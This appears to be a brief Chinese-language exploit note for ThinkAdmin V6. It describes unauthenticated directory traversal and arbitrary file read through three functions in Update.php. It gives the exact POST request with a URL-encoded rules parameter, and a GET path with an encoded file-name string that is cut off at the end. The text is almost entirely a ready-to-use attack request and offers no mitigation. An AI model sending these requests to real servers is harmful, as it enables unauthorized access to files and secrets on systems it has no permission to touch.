一、ThinkAdminV6 任意文件操作 Update.php 三个函数未校验访问权限 目录遍历注意POST数据包rules参数值需要URL编码 POST /admin.html?s=admin/api.Update/node rules=%5B%22.%2F%22%5D 文件读取,后面那一串是UTF8字符串加密后的结果。计算方式在Update.php中的加密函数。 /admin.html?s=admin/api.Update/get/encode/ 34392q302x2r1b37382p382x2r1b1a1…